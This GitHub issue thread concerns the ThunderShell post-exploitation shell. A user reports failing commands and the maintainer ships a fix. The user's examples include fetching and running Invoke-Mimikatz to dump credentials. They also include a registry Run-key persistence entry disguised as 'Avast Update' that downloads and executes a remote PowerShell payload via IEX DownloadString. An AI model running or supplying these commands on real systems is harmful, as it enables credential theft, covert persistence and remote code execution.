### ISSUE TITLE
problem in running commands

### ISSUE THREAD

**Issue by itman224** [Mr-Un1k0d3r/ThunderShell#27]
cant run long commands like "reg add" anyway
and
i got error in running fetch command

**Comment by Mr-Un1k0d3r** [comment]
Can you provide more information about both issue like stack trace or command output so I can properly troubleshoot it.

Thanks,

**Comment by itman224** [comment]
My Command :  fetch https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1 Invoke-Mimikatz


Output :

[*] Fetching https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1
[*] Executing Invoke-Mimikatz
- Sending command: b'function Invoke-Mimikatz\n{\n<#\n.SYNOPSIS\n\nThis script leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as\ndump credentials without ever writing the mimikatz binary to disk. \nThe script has a ComputerName parameter which allows it to be executed against multiple computers.\n\nThis script should be able to dump credentials from any version of Windows through Windows 8.1 that has PowerShell v2 or higher installed.\n\nFunction

------------------------
My Command :
- Sending command: refresh

Output :

 Received Output:
System.Management.Automation.CommandNotFoundException: The term 'refresh' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
   at System.Management.Automation.Runspaces.PipelineBase.Invoke(IEnumerable input)
   at cWKciGwkR.mAqqCIvxwBVEvn.pfAvBXZq(String qwunaVNJrZAmMGx, String NjeoihMpPOM)


------------------------
My Command :
Net user (Username)

Output :

 - Sending command: net

[2019-03-09 03:11:21] Received Output:
( Null )
------------------------
My Command :
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Avast Update" /t REG_SZ /F /D "cmd /c powershell -noprofile -exec bypass IEX (New-Object Net.WebClient).DownloadString('test.com:8080/cat.png')"

Output:

 - Sending command: reg

 Received Output:

------------------------

Most of CMD  Commands dont work in This Version.
But in old version of ThunderShell all this commands works.

**Comment by itman224** [comment]
Thanks for your Support.

**Comment by Mr-Un1k0d3r** [comment]
I will fix the issue please note that refresh is not present anymore since the shell is using sync to pull the output manually.

I also implemented the shell command to run your command through cmd.exe /c

The fetch command issue was caused by the python3 byte format.

I'm going to push an update soon_

**Comment by Mr-Un1k0d3r** [comment]
version 3.1.1 was release and should address the issues.
